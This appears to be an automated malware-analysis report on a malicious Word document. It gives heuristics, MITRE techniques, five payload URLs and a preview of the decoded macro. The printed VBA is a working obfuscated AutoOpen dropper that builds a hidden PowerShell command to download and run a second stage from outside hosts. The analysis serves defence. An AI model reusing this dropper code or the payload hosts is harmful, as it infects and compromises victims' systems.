MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening the document. The macro utilizes WScript.Shell and a Shell() call, indicating an attempt to execute commands, likely to download and run a second-stage payload. The reconstructed command string 'wershell' suggests the execution of PowerShell.
Heuristics (10)
- VBA macros detected (medium, 5 related findings) OLE_VBA_MACROS: Document contains VBA macro code.
- WScript.Shell usage (critical) OLE_VBA_WSCRIPT: WScript.Shell usage. Matched line in script:
    SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
    tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
    qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
- CreateObject call (high) OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
    SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
    tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
    qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
- Payload URL decoded from an encoded PowerShell loader (5 URLs) (high) OLE_VBA_ENCODED_PS_DROPPER_URL: A VBA macro assembles (from literals scattered across helper functions) a WScript.Shell command that runs a PowerShell stage-2 loader whose download URL is hidden in a numeric char-code array, decoded at runtime by [char]($_ -bxor k) (or +k / -k) after splitting on obfuscated delimiters. The decoded hosts (often an @-separated fallback list dropped to %TEMP% and executed) are the next-stage payload URLs, never contiguous on disk; surfaced as IOCs. Self-validating: only a transform yielding a valid host URL is reported.
- VBA p-code auto-exec with execution tokens (high) OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low) OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
    Attribute VB_Name = "msbilcAZjT"
    Sub AutoOpen()
    On Error Resume Next
- Reference to Windows Script Host (high) SC_STR_WSCRIPT: Reference to Windows Script Host.
- Legacy WordBasic auto-exec macro marker (medium) OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (medium) EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://wildpete.com/73v5/ (Referenced by macro)
  - http://www.escoladeemagrecimento.com.br/jl/ (Referenced by macro)
  - http://www.southgatetowerquan7.com.vn/aokE/ (Referenced by macro)
  - http://www.salinzada.com/4A3bU8Pb/ (Referenced by macro)
  - http://www.tomsbigworld.com/VKT9j/ (Referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/main (In document text (OLE body))
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13594 bytes |

SHA-256: 35785d4fb878d2e9da86f724cc3de35b0179316c6a7022ce6716fff3c483562a
Detection:
- ClamAV: No threats found
- Obfuscation or payload: likely. 325 of 610 identifiers look randomly generated (e.g. 'drTTsRzRjjC'), consistent with name-mangling obfuscation.

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "bGQHJKU"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "msbilcAZjT"
Sub AutoOpen()
On Error Resume Next
zCqEo = 40375 + lBOCU * kpcJi / iCFiCA / KQRqb / qDdMD
JLAZQ = 82535 + PWumn * TUMpq / NzNzCN / NXjaSu / iuLJWD
rXlLI = 1342 + rGJqAA * rTJrY / DXKwUK / viJHdZ / rHtqwd
ZfHOU = 80265 + SWvDz * PLvOwM / cpjwbr / jYICTm / oSGihX
vAoWS = 92992 + TzzLJO * jwKndz / uOskNT / tojQpY / prZIvM
XaslMP = 65353 + CvnCRI * Otwqif / MLPVo / jivMRw / wSjiDH
YKrJY = 78259 + TwuEZ * BmwmFd / ZKRuT / IuHkii / JVDAao
sLzbQc = 35544 + KEjFw * OhVqb / AUzal / bsvMN / bDRAOn
lGcTDksjQ (Qtdlrz + GPMUXw)
MOZYr = 55435 + zTklK * cGcYMW / zAZLzq / ivwOSh / OnbvHz
UoJUCa = 52391 + dDwNVG * rPlls / PvBZR / SjiSWN / hrYjTv
TIIKB = 41923 + Uatnr * ILoNaB / hEWWSd / NTBcE / RdsRA
tdKUoG = 96994 + ZNGjH * FsIul / IDwkcz / ZbTfRq / fllhl
End Sub
Function Qtdlrz()
On Error Resume Next
jnKJLW = 82677 - LEunCu * 55250 + LYlAq - (pOVwQN / fQYNDl - kNfGaC - lkSizj - (awTSn - 77916 - voNFdD + 61301))
bsftb = (KZsRmd + iVjuXr - 55600 / lzpiG * 64822 - LOmWET)
WZwIkQ = sianIE / 58476 / TRiQE - EuPzu + 77526 * SBwzG * Otjqwz * FpsAfs + (ltnzm + WRiiLp)
YZddoC = QJnaf / 38354 / MPCPRC - nZNzM + 60758 * zOzfJ * DfLOL * kBcFNT + (zKBcT + nFkAQj)
cMMZqFPd = "wershe" + "ll " + " " + " " + "&" + Chr(40) + " $" + "Env:" + "COMsPe" + "C[4,24" + ",25]-jOiN" + "''" + Chr(41) + Chr(40) + " -jOi" + "N " + Chr(40) + "'4f65"
KAjGC = GThPn / 56177 / ifaJm - zOfAft + 97293 * iCRjKZ * GzjRa * hwYFvw + (jXHffa + wfAEN)
WiTuqv = zZhDo / 7167 / RVLUAd - hPvmdl + 42096 * Sivhk * BhiOR * TYczoP + (VjZjP + hpSXI)
bcQPj = DDciqr / 23279 / QSGuk - XwGvlD + 69454 * DazfE * NEfJZ * sWEoQ + (TStfZF + QfdWV)
dtpABl = notLm / 94642 / SEBuR - zjRUXB + 82713 * nrkiK * vYDWCD * AiYhs + (kCLiiE + fubUcA)
piCfOtR = "N81p105N" + "29u78L6" + "9L87N1" + "3L79N" + "66p74" + "S69K67" + "f84O0"
SYwRk = FWvWii / 28445 / vAQNK - FQKOBw + 54115 * NdzIE * slLtP * ltnTD + (iLtqHX + MCBOiP)
AzzJdc = ZtBir / 27294 / wEtmfZ - JbNCd + 39642 * AwjuCI * BhPEQ * KIKzr + (Pjqihz + oqYkGz)
MlISZW = GWJpXz / 15770 / MdrLD - QbXVa + 23227 * FqXddb * zkUthV * ojAjZn + (qYWXM + vJkwz)
lAjlM = WRCbIw / 57461 / mbrWmB - iPSBG + 31650 * uqzXu * kbIwo * DVHOPY + (inUSOK + mClNkF)
zQQTD = "f110S6" + "9L84y" + "14u119u" + "69p66N99" + "K76L" + "73O69N7"
XizoO = jPYIa / 8100 / XwFBvB - GkHpR + 58152 * GvGMQ * HiuhX * fuUmwS + (SaqlVL + IOmXJ)
TXMclD = zKSth / 96781 / CbBCdM - OZXlNw + 70958 * qvOiKj * umiUmh * BZjLAj + (jKGtsE + oqXHWP)
kDaTR = KmfsDY / 58378 / VMlwJ - cLaQK + 71414 * vJssX * AAcUB * BIBnh + (NrBzvd + NltYdJ)
jvOdm = jAdKt / 85328 / dHPbYs - wtzvNP + 6907 * mHbwK * nGtYBj * NNqGD + (KGWSAk + MmvTQX)
drTTsRzRjjC = "8O84" + "{27L4" + "u107K114" + "O87f29N7" + "K72{84N" + "84{80" + "K26y1"
ENprvu = dpkoAc / 77354 / YwOYw - VBuWwB + 55443 * OAKBfR * fNFWju * tSnBS + (jVkIIq + LuUzsQ)
XOWiui = qBVCXM / 46120 / fIoJVs - PobNi + 59613 * KaIii * zrIMVB * EBQcY + (dGniG + EUwhG)
bjdwzW = skICPv / 5801 / bjujw - sPBtoj + 55122 * tGdSvr * ooEvA * kcGsvf + (TkEIU + jUcEI)
DIrBYw = Lwmvqo / 90899 / HmvAs - ZRICV + 96406 * IoMjvH * ftahww * EjpNU + (pbhhE + jiqjz)
WvaKbGd = "5L15y8" + "7K73" + "y76y68L80" + "f69p84y69" + "L14y" + "67f79N" + "77O1"
ujOIi = EkjGFU / 49619 / pWLzwS - LfNYJj + 88393 * aYtsr * zDjwR * kktNf + (aaorcB + QjABk)
wEDJa = ujzjO / 23407 / EwkUl - oAYFj + 13978 * fjXToJ * izrPuG * SobJNV + (zSzJF + KDZwX)
IKTIi = bhTrS / 60693 / fJBam - sZITc + 67591 * rnbbwC * aJwRcK * DCGiW + (bWuPJ + Brwzq)
ZmUoGs = PjaVLj / 95875 / wpXBkG - UUsLS + 65464 * EiKHa * XjPvO * GcBBjf + (nCBZz + kCSAv)
RZcvwFmrj = "5L23f19" + "L86p2" + "1K15y96u7" + "2f84K" + "84S80" + "u26f15N15"
BTszmG = wWGwNc / 55056 / qKObI - tFtGw + 64340 * WIiVPs * DXmwVV * liKlF + (HcIzB + vINzrn)
ZMNivL = JuDSa / 53470 / zzuTSI - HuzCFM + 3228 * BFjTAo * tzFqjW * kkbzJ + (kHzhm + SSOcp)
rcObb = kwFSXQ / 10705 / rHajUt - dtAiU + 65498 * VpYuKw * iXDioV * BKkjv + (DBnPXu + OjOwH)
mcPtc = IIJjW / 924 / YMbjPu - mtUBJ + 45826 * vPzJG * ZijmRH * mmtRQP + (WpnzwB + csINkF)
wWpkiwMiE = "N87y87p" + "87O14O69" + "f83y6" + "7p79u76S" + "65u68O6" + "9K69O77p6" + "5p71S82N" + "69N67K73" + "{77L69L78" + "N84N"
ABRlG = MHPLkD / 92502 / tiRVT - UwVvqd + 89091 * cZbpI * fKjwiK * Ucurmc + (Nmsurm + EjVudj)
NtJaQZ = pcpSI / 31635 / AACltj - GczKEs + 93504 * aYjCpZ * krAqkj * zhplz + (sFcqYv + QKPLh)
iqkvuV = jzVmJJ / 99995 / aDEBM - qhjzW + 70842 * dLCFdq * mKwrGz * oXHicp + (FRpcTp + JDwYkG)
mSjfT = jQHNu / 25508 / BJZOtv - XtMdJA + 2635 * GzSVtX * EaDJf * pKchG + (mziki + PitGDV)
uUstmcSYU = "79y14O67f" + "79S77y14" + "{66S" + "82N15N74{" + "76N15N96" + "K72u84L84"
spPsG = dttmDj / 5363 / Qbciwn - GCowcQ + 27988 * cbzCb * zvuoF * AjpwaS + (CFRqk + Mmmau)
IDKKu = TDAEw / 21499 / Pnijkv - lOdcN + 77078 * ioIwXh * WAizhJ * KmufZu + (bAKVH + jtZhz)
KPjQKG = bWSfiu / 84099 / saNsXK - MELlNt + 27415 * KVzLvf * Piqtr * jajwsQ + (LZiWS + DfFZt)
NsHKii = MbKiBi / 36304 / cdbpUc - Slmdsh + 55130 * KFzFdF * QAOwDs * rjsAP + (BdkYLT + WXFpP)
oCVbwLf = "u80K26" + "S15f15u8" + "7S87f87y1" + "4O83p79" + "{85f84f7" + "2N71{6" + "5L84p69L" + "84y79{87" + "S69S82N" + "81y85" + "u65{78p23"
LvUfBr = wQfdQ / 65278 / bwiLYH - Ycbbci + 71307 * jFwojL * TWHIhT * wnDOEH + (qwHXl + SsEZJU)
pAdEYp = ANbaYY / 2868 / tFksR - kjUYt + 20308 * FtvZjT * AOcTK * aoCJA + (RHcRUw + iEUIfi)
kajbBi = cHEQaZ / 64095 / oXOddq - IpRuXN + 53088 * iwMUH * HbMVL * isqzMG + (EhKfqI + RqKGKi)
oVRNE = JjvBIS / 21844 / QwUiR - XlXSWL + 26090 * QRGLd * uXZjHf * XlIXYz + (BrpYtH + CzwrtM)
wEUqXjrocQ = "L14K67" + "f79u77p1" + "4y86f" + "78y15u" + "65L79N" + "75f101" + "L15S9" + "6S72" + "S84p84" + "K80y" + "26K15N15{" + "87N87"
jVTzs = SYtrC / 37965 / wCvGW - KLXoqW + 97320 * iZOGwv * jDoSM * oljLjk + (jiDlii + HJhdd)
Qdvwo = NsZkal / 95386 / zPuzO - EYbhRV + 1208 * ZasOTZ * IMajQ * ISEwH + (dDiEt + lzsBOi)
bkwflD = zOzHn / 20618 / VZncKl - DAVcb + 38014 * IaVLpS * EmEac * iRiww + (hwhWE + rbYkc)
Jjwoo = vwsmRm / 66370 / hYllR - iHmdb + 8382 * szrmT * CRsQt * EAzbvj + (nCkTpm + DYBzS)
bMtEE = "y87p14K" + "83{65y" + "76N73O" + "78S90S" + "65O68S65f" + "14p67p79N"
Qtdlrz = cMMZqFPd + piCfOtR + zQQTD + drTTsRzRjjC + WvaKbGd + RZcvwFmrj + wWpkiwMiE + uUstmcSYU + oCVbwLf + wEUqXjrocQ + bMtEE
WCVuKL = UajGw / 26852 / JwMSC - vbktn + 54041 * btCbZt * wEwBBm * kDNPK + (TJBiE + jAuScG)
jMCBB = zcjkp / 15506 / HMYijq - jQOHiB + 98836 * GdPuz * uszwau * SHRvLw + (FitVGV + SwuXAB)
NlaXEj = bRFAK / 34387 / CKYWd - UfSsUX + 54617 * lCmTu * ZfJfI * HjBEBY + (hiqWvw + NiTiDh)
qqPTj = wqWAs / 26740 / VndOrv - vivjqV + 31481 * rMbcb * RqmkUH * qIpdhE + (ZEFrH + IHujcL)
End Function
Function GPMUXw()
On Error Resume Next
wGrtCo = OhDMc / 82291 / NaCCYd - AhScG + 41783 * NOfftZ * owLaZ * FlusF + (sHUpLn + avZZRv)
twKZQ = ODzqdX / 78052 / EaGCIQ - fmGjU + 60645 * JvCII * trzPN * pEcNcU + (wEhoh + vsOME)
jBSXj = RWYcrc / 98521 / KOmaX - cjsYU + 85602 * wWPYt * HaDTWL * jWirw + (nEQjnz + lpAItD)
QSAJDw = ruGvPO / 2260 / GwBalE - hpcZw + 87251 * auZTX * NVZnz * wJKkXl + (IiCHSR + ClKhiz)
sWXrIYnYwE = "77u1" + "5p20K97{1" + "9N66p11" + "7O24{" + "112L66f" + "15N96S72" + "L84y" + "84f80K" + "26f15u15"
snZfE = TlOZqd / 88545 / rlutO - NFPGQT + 11721 * jtZwj * FFYzpR * pjnOwv + (cEBfBJ + mYSPlU)
ZULWw = vPkYNb / 1049 / EXFEo - kjYmG + 3547 * DcLsJA * WpwOau * tzdtrQ + (zNFcpu + qvYQu)
FVAsz = BlNwD / 94968 / XWbrRX - lbstw + 43173 * ThFiD * sjNnWA * lqrEbE + (RPwaw + BTicH)
bziEHO = BuoIo / 41846 / dhuko - szlDk + 59755 * quYFlj * ZuDmjp * DccHIE + (kTZtnp + bNiTc)
KlOrBuODH = "K87S" + "87N8" + "7L14{84N7" + "9f77p83" + "N66S7" + "3L71O" + "87K7" + "9p82u7" + "6y68" + "N14p67p7" + "9f77{15f"
tBFot = XrRPLb / 31576 / EliSJ - IucpbE + 65927 * SkULi * vzjdzz * WmpXQl + (ztnFP + PzZPMo)
JGVjWI = riiHAz / 80273 / XIvbaC - bzLzq + 44284 * hYTHKR * GtkAJp * pRsoz + (DEirC + EfVYZR)
KZjuA = fRECFT / 18856 / mHnSL - TOYzP + 91298 * VwaTQ * sRwGu * YGzur + (mGLdsl + BVnvAi)
EjJVii = JQzpAt / 91985 / MWThPc - zsDoWO + 77859 * VvYOS * zcQIsd * NossBO + (RcTSD + mRRpL)
WkkzusEGC = "118S10" + "7u116" + "p25N74{1" + "5f7O14u11" + "5O80{7" + "6S73p84y8" + "y7L96u" + "7f9K27" + "u4f87"
Uazhj = bEqWwJ / 91845 / wkjRTi - HozTE + 64866 * sSGEd * twRNnw * qMsHD + (KqpGF + iLMmA)
ULbtcf = wOuCYX / 99231 / jELwV - iotcF + 21303 * BjKbz * IdmuP * XPvXZ + (vDODMG + papWiR)
ftSLY = sjCpB / 36064 / iVOTv - pQtXRD + 23290 * quhjK * zHEAf * cPWIVp + (kbsUs + qKzmW)
IMOBl = IrBWW / 33378 / oGTat - Ccjbaz + 50495 * PTGBVh * WcONkn * wVOEb + (DKXkD + UYcko)
FsDYVHzbZ = "f102O" + "100p0L" + "29{0" + "p7S22f17N" + "19S7K27{" + "4p82f9" + "9L65{" + "29{4f" + "69K7" + "8K86L"
bYWhWn = nfEjq / 45237 / lSTic - YizDR + 66003 * cTHahO * zBXUUD * smSKM + (sjFwD + tQzZT)
LftXv = BjOSi / 10075 / JwqdL - WWUlE + 92797 * wUMat * ZIZHSa * tCrrlf + (WuCiv + YSirt)
oIwUX = CctDjv / 98308 / Ynjrh - EbnwOJ + 44585 * UNCcE * fvQYP * IkNpwJ + (tqGjFr + MNVzGN)
jHjAH = vicWIb / 86306 / TOwzEK - bOdwkd + 84670 * aQRBi * djooR * PNjbi + (qszWzB + cItCD)
IEijWilum = "26O84p" + "69K77" + "L80N" + "11u7S124" + "K7S1" + "1u4K87L10" + "2K100O1" + "1f7O14S" + "69K88O69" + "{7p27K70L"
bFuHCZ = jELCAS / 26352 / GzBqcB - rWUiz + 62881 * zLMoKd * kuOouf * DrOhXm + (FqIMY + OYnYZM)
OCLCF = ZKLqhJ / 21752 / GOOiCS - mzTDQQ + 97016 * QjikR * BDLdk * nfBRN + (OzOuPz + lcDswp)
HzpMH = PWCmCh / 43095 / oiFzb - FsUEbl + 6391 * LHqOi * lDBCa * XzCEFf + (Rauhb + TDPflk)
jvKvv = zzXkcD / 44050 / WGpPww - mtRaPQ + 28731 * WXQRE * bpHIR * CtpRdE + (wzZPm + luCsUf)
DaCMhadbqj = "79f82N6" + "9K65" + "O67y72" + "O8O4u106" + "f82N" + "77y0N73" + "S78K0f4N"
HwVWUv = nULAbv / 7606 / cRqEA - GPJbE + 27393 * bdMmY * lnGfL * dRCsBW + (UupATA + IAjMu)
kjBMM = ShvQhH / 63837 / hsEAw - FSWwI + 58240 * TLZwmc * vWrcEs * cBjsIF + (ECwrY + SRJFE)
jVLrw = CZSmW / 72539 / HWHEWH - ItNmc + 86759 * VNkDuk * QHFLun * WBITP + (tjBvNE + GnIZOF)
hLijbB = rOBtcU / 69784 / sFTNEs - Moppuq + 56068 * jwoLmK * ZrNGC * zClkG + (uCGAB + tzttmH)
qhzcIImjBp = "107{1" + "14N87u9O" + "91O84u82S" + "89u91L4f" + "65p81" + "O105S14u" + "100f" + "79{87y" + "78K76p79" + "S65N" + "68S102u73"
EQzzWs = BTjhGd / 60618 / Mauuii - YRqXn + 86656 * lhDzu * cWWII * rEDaj + (nsTrB + Rwirh)
OOVznI = bYfbzz / 81127 / MmDFn - izZvm + 53700 * LZjFGO * DdFzbI * VWiBDt + (mHphT + fRwBA)
wFpth = dIibB / 80532 / mlNrR - rHTAA + 78781 * fwfwVk * NJDfwW * zaVMq + (nPWEHQ + qCfEo)
nVhdl = RBpch / 64525 / vTujwn - LGQaa + 79487 * OwLiw * tijQzj * Zczmo + (OUCwV + RdthFG)
jUzzuwGP = "u76u69p8" + "K4{106L82" + "K77{12N0f" + "4K82S99y" + "65y9{" + "27N115f8" + "4N65L" + "82K84K1" + "3L112" + "u82u79S" + "67S69{83"
cwLMU = abOJoq / 60711 / MczjE - zVqczn + 92158 * qjYim * EPwCz * sIdAkl + (bJntRk + DHIjM)
wACCi = iqzMnd / 68495 / hliId - EbkMCp + 94586 * NABaJu * GWZTnF * OIPSlS + (sKZbVw + PqAoB)
tIkikK = aTwfu / 73068 / mprpr - zUIDn + 14627 * PBwHNp * DjXvQ * hPHMHw + (dkNQTr + iYzhud)
oYWpR = UDDRv / 48141 / hiNvv - cQiojn + 42143 * iijqAn * sqlXp * KZhvUu + (RzLElF + zKkqB)
mtwFZ = "y83f0K4p8" + "2u99u65S2" + "7O66L8" + "2L69O65u" + "75p27N9" + "3O67O65" + "y84u" + "67L72L91{"
zzvFn = BLPuri / 46520 / kbzbkz - lEDVN + 31929 * tsTvZ * aJYXTC * UunQiU + (XZqdUp + OurjaQ)
NmYTbu = GoscXF / 91679 / rwsLt - aiTfEv + 74308 * iFuWt * XAOUZI * dHjjf + (iHNsi + AnEFo)
SXbwIa = bCZHi / 39534 / rRnqt - qTBqa + 70617 * LOhotl * BWLUWt * wXQVmU + (XdDshs + wVlVXb)
MUlNw = DUFTUz / 84309 / wlUoQG - livMtt + 4886 * ZwwSj * CfIprq * XkYhA + (CkRhH + LbqqA)
VpjAmSd = "93N93'" + ".SpLIt" + Chr(40) + "'S" + "NKOLp" + "fyu{'" + Chr(41) + "|" + " % {" + " [ChaR" + "] " + Chr(40) + " " + "$_ -Bxo" + "r " + Chr(34) + "0x" + "20" + Chr(34) + Chr(41) + "} " + Chr(41) + Chr(41)
GPMUXw = sWXrIYnYwE + KlOrBuODH + WkkzusEGC + FsDYVHzbZ + IEijWilum + DaCMhadbqj + qhzcIImjBp + jUzzuwGP + mtwFZ + VpjAmSd
fkqzh = ENSaC / 42566 / UfDtrk - hHruv + 29867 * laLof * JWPww * OBWQfY + (RzqGCJ + WYXtw)
kATjV = hLItF / 22898 / ZPlNtW - soAQHQ + 81767 * UJMpHl * pjrOC * ovIfF + (iFaNwT + KvADY)
RuTmG = WCVwPF / 92421 / WBKrM - EwWuT + 18157 * MzlwWB * JTijJu * ovAbB + (twUNj + awTYYS)
FJFkzt = CGCSb / 64275 / UQCVT - DlQcY + 34343 * bvpvJR * oriLB * zDntBl + (PFiRDE + tUtdMh)
End Function
Attribute VB_Name = "kMGQLqGH"
Function lGcTDksjQ(cqXUlPIviPO)
On Error Resume Next
CCrFDm = (NulNh - PwwCms + pkPLd * hwIMkA)
PoiEip = (ZroQZi - ippFr + GbJbG * zhYmti)
cDqjmT = (GMpwtL - AiWAAQ + rofGz * rzAEvh)
ifwqR = (OOuzCR - BXuww + DOnRm * cOEDEh)
UtFXL = (AwXGTA - YoCjmY + GPLuw * phXQJ)
MUMjw = (kpiEu - NuEnKD + OSzwv * LKphJ)
pPBED = (nwqNcY - siZmX + uAvTjP * RWmzu)
SUEQnH = (wXcWt - TtqiOm + YdBFh * btASb)
tmjHww = pcUNM + CreateObject("Wscript.shell").Run(sdOqSu + Chr(vbKeyP) + XoHbooRKVuu + Chr(vbKeyO) + cqXUlPIviPO + BcACfCk, 582646734 - 582646734)
qccWRq = (boKThX - wmTlh + tkinHu * YBWNOX)
zahUU = (PcYcu - sRScYw + JdITpT * jdjUvE)
QvBlZ = (KzKbw - XMPrwV + TScoG * AUomwE)
suktZ = (WafIJ - jkEiV + OFmFu * OXwaZR)
End Function